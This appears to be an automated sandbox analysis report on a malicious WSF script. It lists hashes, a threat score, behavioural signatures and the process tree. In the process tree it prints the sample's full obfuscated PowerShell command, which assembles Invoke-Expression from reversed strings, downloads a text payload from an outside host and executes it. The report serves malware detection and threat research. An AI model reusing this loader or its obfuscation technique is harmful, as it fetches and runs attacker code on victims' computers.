Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
14/02/2024, 07:44
Static task
static1
Behavioral task
behavioral1
Sample
doc20241402070611.wsf
Resource
win7-20231215-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
doc20241402070611.wsf
Resource
win10v2004-20231215-en
9 signatures
150 seconds
General
-
Target
doc20241402070611.wsf
-
Size
1KB
-
MD5
1cef4895af813de334d132c8a8c4995a
-
SHA1
540629b7bd97ee548300c9390b740f3d77449fd2
-
SHA256
e749d258ab856425335b85c2a15a7902541e896431fd05725b1c35dff7b89d10
-
SHA512
4c58be35b389ae6c2c036180271607de769e642a61611553998a5f9f3f0c492832c0ef1b4c624cbbff3d71e36284b857a8342ac3f6c048c67a1e2fc77a473666
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 2436 powershell.exe 7 2436 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeIncreaseQuotaPrivilege 2436 powershell.exe Token: SeSecurityPrivilege 2436 powershell.exe Token: SeTakeOwnershipPrivilege 2436 powershell.exe Token: SeLoadDriverPrivilege 2436 powershell.exe Token: SeSystemProfilePrivilege 2436 powershell.exe Token: SeSystemtimePrivilege 2436 powershell.exe Token: SeProfSingleProcessPrivilege 2436 powershell.exe Token: SeIncBasePriorityPrivilege 2436 powershell.exe Token: SeCreatePagefilePrivilege 2436 powershell.exe Token: SeBackupPrivilege 2436 powershell.exe Token: SeRestorePrivilege 2436 powershell.exe Token: SeShutdownPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeSystemEnvironmentPrivilege 2436 powershell.exe Token: SeRemoteShutdownPrivilege 2436 powershell.exe Token: SeUndockPrivilege 2436 powershell.exe Token: SeManageVolumePrivilege 2436 powershell.exe Token: 33 2436 powershell.exe Token: 34 2436 powershell.exe Token: 35 2436 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2436 2180 WScript.exe 28 PID 2180 wrote to memory of 2436 2180 WScript.exe 28 PID 2180 wrote to memory of 2436 2180 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc20241402070611.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://delp-heizungsbau.de/DT9.txt';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-